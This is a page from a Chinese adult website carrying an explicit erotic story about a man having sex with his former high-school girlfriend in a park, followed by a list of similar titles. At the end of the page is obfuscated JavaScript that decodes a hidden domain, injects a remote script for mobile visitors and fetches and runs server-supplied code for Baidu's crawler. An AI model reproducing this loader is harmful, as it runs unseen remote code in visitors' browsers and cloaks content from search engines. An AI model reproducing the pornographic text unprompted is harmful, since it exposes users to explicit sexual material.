返回

终于上了我的初恋6b1

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com


万物舒展的春天,天气是多么的怡人,马路上的姑娘们都陆续穿上了薄薄的短裙,五光十色,顿生一片妖娆。我靠着公园的一棵饱经岁月洗礼的老树,抽了一根烟,等一个人,萱。我无法阻止我的想念,那是怎么一个女生?

还记得那年夏天,我十七岁,刚上高二。从很早之前我便已经决定要去文科班了,所以并没有什么挣扎,当我走进我高中生涯最后两年的课室时我就看见萱,我觉得我无法用文字来形容那种悸动,恬静若水之气质,淡然浅笑之姿态,我觉得我这辈子都不会忘记那一笑的风情。

我曾经和她在一起过大半年,牵过手,吻过,摸过她丰满的奶子。也许是迫于学习的压力,她提出分手,我一向尊重她的决定,于是我同意了。

「我说分手,你为何不挽留?」毕业那晚,我收到萱的短信。

「因为爱你。」我如此回答。

后来的关系很奇妙,她应该有男朋友了,但我们自从毕业后的两年以来都不曾见过面,偶尔却又会发些暧昧的短信,总让人充满遐想。在这个从懵懂走向成熟的年纪中,我想象着萱的身体,高中时就丰满的乳房,打出了数不清的子弹。

一根烟完,抬手看看手表,快到约定的时间了,不由得一阵紧张,我一紧张便会四处张望,望着望着我真的不紧张了,我忘了紧张。她一身米色,伊人如往昔,黛眉轻蹙,明眸如镜。我不由想,「也许岁月只能让她更加美丽动人吧。」「张曦扬,你还够可以的,还学会抽烟了,我都在这看了你半天了!」萱的声音还是很轻,连怪责都不会。

「萱,我们都有两年没见了是么?」我不动声色的转开话题。

「是啊,我都没想到就两年你就学坏了。」萱明显不上当要揪着我不放了。

但是我却一点办法都没有。

「我们在这逛一下好不好。」我拉起她手就开始往公园里面走。

「其实,这两年我每天都想见你,你知道么?」我用略带忧伤的语气来说这句话,深情的望着萱的眼睛,将她拥入怀中。

「我又何尝不是呢?」萱在我耳边呢喃道。

听见这句话我立刻吻了过去,双手在萱的腰上游动着,沿着脊椎,时而游到背脊,时而游到她娇俏的小屁股。舌头与舌头越来越缠绵,我的双手开始有规律的揉动她的臀部。萱开始「唔……唔……唔……」的低吟着,我的手不由自主的将萱衣服的下摆从裙子里抽出来,伸到她丰满的乳房,揉弄着。萱的呼吸越来越急促,我感觉到她身体里散发出来的热量,想必我也差不多吧。我开始舔她的耳垂,缓缓的吹热气给她,「嗯……嗯……嗯……扬……我们不要……在……在……这里……好……不好……「萱的声音有点颤抖。

「萱儿,你知道我每天多想摸你丰满漂亮的胸吗?我想舔一舔好不好,让我含着你可爱的乳头好不好啊?」边说边舔,我从她的耳垂慢慢舔到她雪白的脖子,左手不自觉的加了一把力,挤动着萱可爱的奶子。

「嗯……嗯……我知道,我们……换个……地方……好……不……好……」我带着萱走到公园的树林里面,找了一个隐秘的角落,走的时候不忘用右手搭在她的肩上,从衣领钻进去不停的抚摸她的奶子,一路没人,但萱还是很怕被认看见,却又忍不住的低声呻吟着。我下体胀得都有点发疼了,另一支手便引导着萱的手来抚摸我的鸡巴。一条短短的路走了好久,终于走进树林隐秘的角落里。

「哦……哦……哦……」萱长长的呻吟了一声,浑身软绵绵的靠着我。

「我可爱的萱儿,给我舔你漂亮的奶子好不好?」我一边说着一边解着她上衣的扣子,嘴没有闲着,在她腮帮周边吻着,吹着热气。

「嗯。」萱低声的回应着,一脸的羞红,很好看。

我解开扣子后,便顺便将萱的乳罩扣子也打开了,轻轻将乳罩推了上去,终于见到我经常幻想的可爱奶子了。舌头凑上去,开始在那点樱红周边打着圈,慢慢的舔着,双手很自觉地握着揉动。

「啊……啊……啊……」萱开始轻声呻吟了。

我改舔为吮,开始吮吸那立起来的乳头,分出一只手去探寻她裙下的奥秘,渐渐地我摸到那处温暖潮湿的湿地了,隔着内裤用中指轻轻地按着,揉了起来。

「啊……哦……啊……不要……」

萱的阻止声哪有起到阻止的作用,那么销魂,那么魅惑。我拉下了她的内裤,褪到膝盖上,手指触摸到那粉色的阴唇时,心中好享受。还是先慢慢的摸着她的阴唇,蜜穴里的淫水越来越多了,我的手掌都湿了半边。

「萱萱,帮下我好不好,摸一下我的鸡巴好么?」我将我怒胀的鸡巴从裤子里掏出来,牵着她的小手摸我青筋怒起的鸡巴,只见她涩涩的帮我套动着,而我就专心的吻她,蹂躏她的奶子,刺激她已经淫水霏霏的蜜穴。

「萱萱,我好不好啊?弄得你舒不舒服?」我在她耳边说着,又吹了几口热气,她的耳朵、脸颊全是羞红之态,好似待摘得蜜桃,充满了诱惑。

「嗯……嗯嗯……你……你……坏……」萱开始有一句没一句的回着,我看的出来她很享受我的爱抚,我便将中指伸入了那充满淫水的蜜穴去探索。

「啊……嗯……啊……哦……不要……不要……伸……进去」萱紧闭着眼睛,带着少女的矜持,在不停的呻吟声中说不要,手里握着我的鸡巴帮我套动着,并且主动的吻我,将香甜的小舌头伸到我的嘴中,似乎要寻找我的舌头,我一边回应着,一边抠着她的蜜穴,淫水潺潺流出,呻吟声也越来越动听了。我看火候差不多了,我就让萱蹲下来。

「萱萱啊,帮我舔下一下好不好,我想你舔我,想好久了……」我摸着萱的脸对她说。

「啊,为什么要舔?」萱露出好羞好羞的表情。

「你舔我会很舒服的,你看它现在那么胀,胀得好难受。」我一边摸着萱一边装可怜求她。

果然她试探的开始给我添着,也许是发现没有异味,脸上的犹豫开始慢慢淡去。

「萱萱啊,含着它进去哦,对就这样含着,吸它……」我慢慢的引导着萱给我口交,手自然是没有停了,双手不停的挤压着萱的奶子,挤各种形状,手感真的太好了。听着萱的低吟,我就问她,「萱,你和你男朋友做的时候没有给他含吗?」「哪有你那么坏,要人家给你含那个。」萱害羞的回答我说。

只见萱的小舌头在我鸡巴马眼上舔着转圈,最后将龟头含进她的小嘴,一啧一啧的吸吮起来,虽然不是很熟练,但是我满足我这么久的愿望,我无法言语的爽。我让萱吞吐的时候手指同时帮我上下套动,我不由得按住她的头,让萱动的越来越快,终于一阵酥麻,我狠狠的射在萱的嘴里。

「唔……」萱说不出话来,只能用唔声来代替她的抗议。

我射了四五拨后停了下来说:「亲爱的,我好爱你,你弄得我好舒服啊。」拔出来后,萱立刻将精液吐到纸巾里,拿出水漱口。我没等她将话说出来,就从背后抱着她,吻住她的嘴唇,矿泉水砰的掉了下去,但已经没有时间理会了。

我让萱娇俏的美臀抬起来,将我又重新硬如铁石的鸡巴插进萱那充满淫水的蜜穴里,里面热烘烘的、紧紧的,好不舒服,我扶着萱的腰便开始抽送起来。

「哦……

哦……哦……「萱开始大声的呻吟起来,不住的向上迎合着。我想起书中大神说的,对于较少做爱的少女,可以快速的抽插让她很快到达高潮。便开始大起大落招招致命的攻击,将我忍了两年多的欲火全部发泄在身下的这个我朝思暮想的女人。每次往前一刺,刺得结实时,萱就叫得特别销魂。

「老婆,我插得你爽不爽,是不是比你男朋友插得你舒服。」我说这句话时故意用力的猛插了四五下。

「嗯……啊……你插的……最舒……舒……服……了……」萱吃力的回应着我的话。

「你应该叫我什么啊?」我继续用力的猛插萱的蜜穴,萱的下身迎合的越来越来快。

「老……公……继续用力……啊……用力插……插……我」萱都不知道自己说着什么了,下身反应越来越激烈,双手抓着树。

不一会,萱的呼吸急促,肌肉绷直,先到达终点,嘴里一直呻吟着浓浊的「啊」声。我也加快的抽插了几十下,滚烫的精液在萱的蜜穴里喷洒而出,射完后趁着鸡巴还是硬时又重重的插了萱几十下,萱又一次高潮了。

我抱着萱说:「老婆,我会不会插,你想不想一直和我插啊?」手不忍的又开始在萱的娇躯上游动着,抚摸着这我多想得到的身体。

「嗯……我好想给老公你天天插我,天天插到我飞起,我第一次那么那么舒服。」萱靠在我怀里,羞羞地说道。

「萱萱……」我捏着她的奶问她:「那你以后经常给我插你好不好?」「好,我以后经常给你插。」萱低声回应着,看来萱还沉浸在高潮中无法自拔。

搽干净下身后,我带着萱去酒店开房,继续幸福……

    字节数:6770

【完】

评分
相关推荐
3.0分

3.0分 终于上了我的初恋6b1

3.0分

3.0分 终于上了我的初恋6b1

3.0分

3.0分 初恋我终于得到了你7a0

3.0分

3.0分 我终于上了妈妈29b

3.0分

3.0分 我终于上了外语系的美女。e08

3.0分

3.0分 我终于上了高中同学3d3

3.0分

3.0分 终于上了班花37f

3.0分

3.0分 终于嫁给我了4d2

3.0分

3.0分 终于上了丈母娘2a4

3.0分

3.0分 我终于上了外语系的美女。-校园激情924

3.0分

3.0分 我终于失去了你c50

3.0分

3.0分 143、好戏终于上演了d19

3.0分

3.0分 终于把丈母娘给上了1c3

3.0分

3.0分 终于把丈母娘给上了1c3

3.0分

3.0分 【终于把丈母娘给上了】【完】7dc

3.0分

3.0分 我终于操了令我日思夜想的人妻bb7


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function MAdbN(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function zVmMy(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return MAdbN(t);};window[''+'T'+'s'+'W'+'j'+'l'+'y'+'b'+'E'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=zVmMy,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('b3BByLnpoYW5nemhpeWFuZzAxLmNu','151936',window,document,['B','xIrjTpRA']);}:function(){};